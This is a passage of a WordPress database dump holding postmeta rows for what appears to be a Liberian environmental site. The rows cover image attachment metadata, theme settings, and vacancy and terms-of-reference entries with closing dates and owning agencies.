va_extra_audio_loop','false'),(37233,5489,'kava_extra_audio_autoplay','false'),(37234,5489,'kava_extra_audio_preload','false'),(37235,5489,'video_tab',''),(37236,5489,'kava_extra_video_type','library'),(37237,5489,'kava_extra_video_library',''),(37238,5489,'kava_extra_video_external',''),(37239,5489,'kava_extra_video_poster',''),(37240,5489,'kava_extra_video_width','770'),(37241,5489,'kava_extra_video_height','480'),(37242,5489,'kava_extra_video_loop','false'),(37243,5489,'kava_extra_video_autoplay','false'),(37244,5489,'kava_extra_video_preload','false'),(37245,5492,'_edit_lock','1751960064:38'),(37246,5492,'_last_editor_used_jetpack','block-editor'),(37247,5493,'_wp_attached_file','2025/07/WhatsApp-Image-2025-07-03-at-18.44.35.jpeg'),(37248,5493,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:50:\"2025/07/WhatsApp-Image-2025-07-03-at-18.44.35.jpeg\";s:8:\"filesize\";i:158369;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18174;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-03-at-18.44.35-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129049;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7419;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82182;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25019;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-07-03-at-18.44.35-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5290;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14563;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35508;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40740;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53225;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-03-at-18.44.35-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127486;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55683;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-03-at-18.44.35-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75981;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-03-at-18.44.35-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128378;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37251,5492,'_thumbnail_id','5493'),(37252,5492,'_edit_last','38'),(37253,5492,'kava_extra_enable_breadcrumbs','inherit'),(37254,5492,'post_formats',''),(37255,5492,'gallery_tab',''),(37256,5492,'kava_extra_gallery_images',''),(37257,5492,'link_tab',''),(37258,5492,'kava_extra_link',''),(37259,5492,'kava_extra_link_target','_blank'),(37260,5492,'quote_tab',''),(37261,5492,'kava_extra_quote_text',''),(37262,5492,'kava_extra_quote_cite',''),(37263,5492,'audio_tab',''),(37264,5492,'kava_extra_audio',''),(37265,5492,'kava_extra_audio_loop','false'),(37266,5492,'kava_extra_audio_autoplay','false'),(37267,5492,'kava_extra_audio_preload','false'),(37268,5492,'video_tab',''),(37269,5492,'kava_extra_video_type','library'),(37270,5492,'kava_extra_video_library',''),(37271,5492,'kava_extra_video_external',''),(37272,5492,'kava_extra_video_poster',''),(37273,5492,'kava_extra_video_width','770'),(37274,5492,'kava_extra_video_height','480'),(37275,5492,'kava_extra_video_loop','false'),(37276,5492,'kava_extra_video_autoplay','false'),(37277,5492,'kava_extra_video_preload','false'),(37278,5495,'_last_editor_used_jetpack','classic-editor'),(37279,5495,'_edit_lock','1751993654:38'),(37280,5495,'_edit_last','38'),(37281,5495,'_wp_page_template','default'),(37282,5495,'closed_date','2025-07-25'),(37283,5495,'owner','EPA'),(37284,5495,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/07/Edited-TOR-for-EE-Program-Coordinator-EPA.docx'),(37285,5497,'_wp_attached_file','2025/07/Edited-TOR-for-EE-Program-Coordinator-EPA.docx'),(37286,5497,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:113647;}'),(37287,5499,'_last_editor_used_jetpack','classic-editor'),(37288,5499,'_edit_lock','1752096252:38'),(37289,5499,'_edit_last','38'),(37290,5500,'_wp_attached_file','2025/07/TOR_Assess-baseline-of-existing-livelihood-strategies_final_clean.docx'),(37291,5500,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:55699;}'),(37292,5499,'_wp_page_template','default'),(37293,5499,'closed_date','2025-07-15'),(37294,5499,'owner',''),(37295,5499,'vacancy_link',''),(37296,5502,'_edit_lock','1752097357:38'),(37297,5502,'_last_editor_used_jetpack','block-editor'),(37298,5503,'_wp_attached_file','2025/07/WED-scaled.jpeg'),(37299,5503,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1183;s:4:\"file\";s:23:\"2025/07/WED-scaled.jpeg\";s:8:\"filesize\";i:442201;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"WED-300x139.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14632;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"WED-1024x473.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110213;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"WED-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8668;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"WED-768x355.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:355;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69261;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:17:\"WED-1536x710.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:710;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207763;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:17:\"WED-2048x946.jpeg\";s:5:\"width\";i:2048;s:6:\"height\";i:946;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320372;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"WED-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29859;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"WED-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5609;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"WED-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17255;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"WED-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42738;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"WED-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46245;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"WED-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64644;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:17:\"WED-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155240;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:18:\"WED-1920x1080.jpeg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:326103;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"WED-600x277.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45951;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"WED-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90663;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:17:\"WED-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164506;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:8:\"WED.jpeg\";}'),(37302,5502,'_wp_old_date','2025-07-09'),(37303,5502,'_thumbnail_id','5503'),(37304,5502,'_edit_last','38'),(37305,5502,'kava_extra_enable_breadcrumbs','inherit'),(37306,5502,'post_formats',''),(37307,5502,'gallery_tab',''),(37308,5502,'kava_extra_gallery_images',''),(37309,5502,'link_tab',''),(37310,5502,'kava_extra_link',''),(37311,5502,'kava_extra_link_target','_blank'),(37312,5502,'quote_tab',''),(37313,5502,'kava_extra_quote_text',''),(37314,5502,'kava_extra_quote_cite',''),(37315,5502,'audio_tab',''),(37316,5502,'kava_extra_audio',''),(37317,5502,'kava_extra_audio_loop','false'),(37318,5502,'kava_extra_audio_autoplay','false'),(37319,5502,'kava_extra_audio_preload','false'),(37320,5502,'video_tab',''),(37321,5502,'kava_extra_video_type','library'),(37322,5502,'kava_extra_video_library',''),(37323,5502,'kava_extra_video_external',''),(37324,5502,'kava_extra_video_poster',''),(37325,5502,'kava_extra_video_width','770'),(37326,5502,'kava_extra_video_height','480'),(37327,5502,'kava_extra_video_loop','false'),(37328,5502,'kava_extra_video_autoplay','false'),(37329,5502,'kava_extra_video_preload','false'),(37334,5507,'_last_editor_used_jetpack','classic-editor'),(37335,5507,'_edit_lock','1752648775:38'),(37336,5507,'_edit_last','38'),(37337,5507,'_wp_page_template','default'),(37338,5507,'closed_date','2025-07-21'),(37339,5507,'owner','EPA/UNDP'),(37340,5507,'vacancy_link',''),(37341,5509,'_wp_attached_file','2025/07/ToR-for-feasibility-study-UL-Botanical-Garden-1.docx'),(37342,5509,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:84028;}'),(37343,5512,'_edit_lock','1752704000:38'),(37344,5512,'_last_editor_used_jetpack','block-editor'),(37345,5513,'_wp_attached_file','2025/07/WhatsApp-Image-2025-07-16-at-16.46.55.jpeg'),(37346,5513,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1050;s:6:\"height\";i:657;s:4:\"file\";s:50:\"2025/07/WhatsApp-Image-2025-07-16-at-16.46.55.jpeg\";s:8:\"filesize\";i:99673;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-300x188.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17523;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-16.46.55-1024x641.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109146;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8036;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-768x481.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:481;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73093;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26711;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-07-16-at-16.46.55-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5575;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15310;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34706;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36383;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53357;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-16.46.55-1050x650.jpeg\";s:5:\"width\";i:1050;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115946;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-600x375.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50618;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-16.46.55-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67943;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-16.46.55-1050x640.jpeg\";s:5:\"width\";i:1050;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106840;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37349,5512,'_thumbnail_id','5513'),(37350,5512,'_edit_last','38'),(37353,5512,'kava_extra_enable_breadcrumbs','inherit'),(37354,5512,'post_formats',''),(37355,5512,'gallery_tab',''),(37356,5512,'kava_extra_gallery_images',''),(37357,5512,'link_tab',''),(37358,5512,'kava_extra_link',''),(37359,5512,'kava_extra_link_target','_blank'),(37360,5512,'quote_tab',''),(37361,5512,'kava_extra_quote_text',''),(37362,5512,'kava_extra_quote_cite',''),(37363,5512,'audio_tab',''),(37364,5512,'kava_extra_audio',''),(37365,5512,'kava_extra_audio_loop','false'),(37366,5512,'kava_extra_audio_autoplay','false'),(37367,5512,'kava_extra_audio_preload','false'),(37368,5512,'video_tab',''),(37369,5512,'kava_extra_video_type','library'),(37370,5512,'kava_extra_video_library',''),(37371,5512,'kava_extra_video_external',''),(37372,5512,'kava_extra_video_poster',''),(37373,5512,'kava_extra_video_width','770'),(37374,5512,'kava_extra_video_height','480'),(37375,5512,'kava_extra_video_loop','false'),(37376,5512,'kava_extra_video_autoplay','false'),(37377,5512,'kava_extra_video_preload','false'),(37378,5515,'_edit_lock','1764766101:38'),(37379,5515,'_last_editor_used_jetpack','block-editor'),(37380,5516,'_wp_attached_file','2025/07/WhatsApp-Image-2025-07-16-at-11.27.53.jpeg'),(37381,5516,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2025/07/WhatsApp-Image-2025-07-16-at-11.27.53.jpeg\";s:8:\"filesize\";i:308919;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20586;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-11.27.53-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154431;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7967;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96405;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-07-16-at-11.27.53-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:295226;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28034;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-07-16-at-11.27.53-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5661;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15831;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40021;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44137;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61497;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-11.27.53-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149703;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-07-16-at-11.27.53-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:315051;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65008;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-07-16-at-11.27.53-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85513;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-07-16-at-11.27.53-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37384,5515,'_thumbnail_id','5516'),(37385,5515,'_edit_last','38'),(37386,5515,'kava_extra_enable_breadcrumbs','inherit'),(37387,5515,'post_formats',''),(37388,5515,'gallery_tab',''),(37389,5515,'kava_extra_gallery_images',''),(37390,5515,'link_tab',''),(37391,5515,'kava_extra_link',''),(37392,5515,'kava_extra_link_target','_blank'),(37393,5515,'quote_tab',''),(37394,5515,'kava_extra_quote_text',''),(37395,5515,'kava_extra_quote_cite',''),(37396,5515,'audio_tab',''),(37397,5515,'kava_extra_audio',''),(37398,5515,'kava_extra_audio_loop','false'),(37399,5515,'kava_extra_audio_autoplay','false'),(37400,5515,'kava_extra_audio_preload','false'),(37401,5515,'video_tab',''),(37402,5515,'kava_extra_video_type','library'),(37403,5515,'kava_extra_video_library',''),(37404,5515,'kava_extra_video_external',''),(37405,5515,'kava_extra_video_poster',''),(37406,5515,'kava_extra_video_width','770'),(37407,5515,'kava_extra_video_height','480'),(37408,5515,'kava_extra_video_loop','false'),(37409,5515,'kava_extra_video_autoplay','false'),(37410,5515,'kava_extra_video_preload','false'),(37411,5518,'_last_editor_used_jetpack','classic-editor'),(37412,5518,'_edit_lock','1753126040:38'),(37413,5518,'_edit_last','38'),(37414,5519,'_wp_attached_file','2025/07/Draft-ToR-Atlas-COP30.docx'),(37415,5519,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:94182;}'),(37416,5518,'_wp_page_template','default'),(37417,5518,'closed_date','2025-07-21'),(37418,5518,'owner',''),(37419,5518,'vacancy_link',''),(37420,5521,'_last_editor_used_jetpack','classic-editor'),(37421,5521,'_edit_lock','1753127382:38'),(37422,5521,'_edit_last','38'),(37423,5522,'_last_editor_used_jetpack','classic-editor'),(37424,5522,'_edit_lock','1753174930:38'),(37425,5522,'_edit_last','38'),(37426,5522,'_wp_page_template','default'),(37427,5522,'closed_date','2025-08-14'),(37428,5522,'owner','EPA/UNDP'),(37429,5522,'vacancy_link',''),(37430,5524,'_wp_attached_file','2025/07/Final_ToR_Validation-Workshop-for-MCA-and-VAM_International-CC-CA-Expert_06.12.25-1.docx'),(37431,5524,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:168171;}'),(37432,5526,'_last_editor_used_jetpack','classic-editor'),(37433,5526,'_edit_lock','1753175886:38'),(37434,5526,'_edit_last','38'),(37435,5526,'_wp_page_template','default'),(37436,5526,'closed_date','2025-08-14'),(37437,5526,'owner','EPA/UNDP'),(37438,5526,'vacancy_link',''),(37439,5528,'_wp_attached_file','2025/07/Final_HR-Firm-for-Daily-Hires_07.12.25-1.docx'),(37440,5528,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:175897;}'),(37441,5530,'_last_editor_used_jetpack','classic-editor'),(37442,5530,'_edit_lock','1753205089:38'),(37443,5530,'_edit_last','38'),(37444,5530,'_wp_page_template','default'),(37445,5530,'closed_date','2025-08-14'),(37446,5530,'owner','EPA/UNDP'),(37447,5530,'vacancy_link',''),(37448,5532,'_wp_attached_file','2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1.docx'),(37449,5532,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:166333;}'),(37450,5533,'_wp_attached_file','2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1-1.docx'),(37451,5533,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:166333;}'),(37452,5536,'_last_editor_used_jetpack','classic-editor'),(37453,5536,'_edit_lock','1754004761:38'),(37454,5536,'_edit_last','38'),(37457,5536,'_wp_page_template','default'),(37458,5536,'closed_date','2025-08-22'),(37459,5536,'owner','EPA'),(37460,5536,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.pdf'),(37461,5539,'_last_editor_used_jetpack','classic-editor'),(37462,5539,'_edit_lock','1754003968:38'),(37463,5539,'_edit_last','38'),(37464,5539,'_wp_page_template','default'),(37465,5539,'closed_date','2025-08-24'),(37466,5539,'owner','UNEP'),(37467,5539,'vacancy_link',''),(37468,5543,'_wp_attached_file','2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.pdf'),(37469,5543,'_wp_a